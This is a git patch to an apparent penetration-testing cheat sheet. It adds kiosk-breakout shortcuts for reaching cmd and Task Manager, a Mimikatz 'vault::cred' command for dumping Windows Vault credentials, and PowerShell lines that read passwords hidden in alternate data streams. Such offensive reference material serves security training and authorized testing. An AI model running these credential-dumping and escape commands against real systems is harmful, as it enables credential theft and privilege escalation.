From 01aadf3a44317bf0fcac3f9f89838c87a828b816 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 13 Jan 2021 10:22:59 +0100 Subject: [PATCH] Alternate Data Stream --- Methodology and Resources/Escape Breakout.md | 3 ++- Methodology and Resources/Windows - Mimikatz.md | 8 +++++++- .../Windows - Privilege Escalation.md | 8 ++++++++ 3 files changed, 17 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Escape Breakout.md b/Methodology and Resources/Escape Breakout.md index 016f612..d5c9571 100644 --- a/Methodology and Resources/Escape Breakout.md +++ b/Methodology and Resources/Escape Breakout.md @@ -20,10 +20,11 @@ * **Shortcut** * [Window] + [R] -> cmd * [CTRL] + [ALT] + [SHIFT] -> Task Manager + * [CTRL] + [ALT] + [DELETE] -> Task Manager * **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it * **Drag-and-drop**: dragging and dropping any file onto the cmd.exe * **Hyperlink**: `file:///c:/Windows/System32/cmd.exe` -* **Task Manager**: `File` > `New Task (Run...)` +* **Task Manager**: `File` > `New Task (Run...)` > `cmd` * **MSPAINT.exe** * Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels * Zoom in to make the following tasks easier diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index e76595c..7fad18a 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -190,7 +190,7 @@ $ mimikatz !sekurlsa::dpapi $ mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b ``` -Task Scheduled credentials +### Task Scheduled credentials ```powershell mimikatz(commandline) # vault::cred /patch @@ -204,6 +204,12 @@ Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Attributes : 0 ``` +### Vault + +```powershell +vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\" +``` + ## Mimikatz - Commands list diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index bbc1af6..885bbbd 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -21,6 +21,7 @@ * [Sticky Notes passwords](#sticky-notes-passwords) * [Passwords stored in services](#passwords-stored-in-services) * [Powershell history](#powershell-history) + * [Password in Alternate Data Stream](#password-in-alternate-data-stream) * [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks) * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services) * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl) @@ -477,6 +478,13 @@ cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw ``` +### Password in Alternate Data Stream + +```ps1 +PS > Get-Item -path flag.txt -Stream * +PS > Get-Content -path flag.txt -Stream Flag +``` + ## EoP - Processes Enumeration and Tasks What processes are running?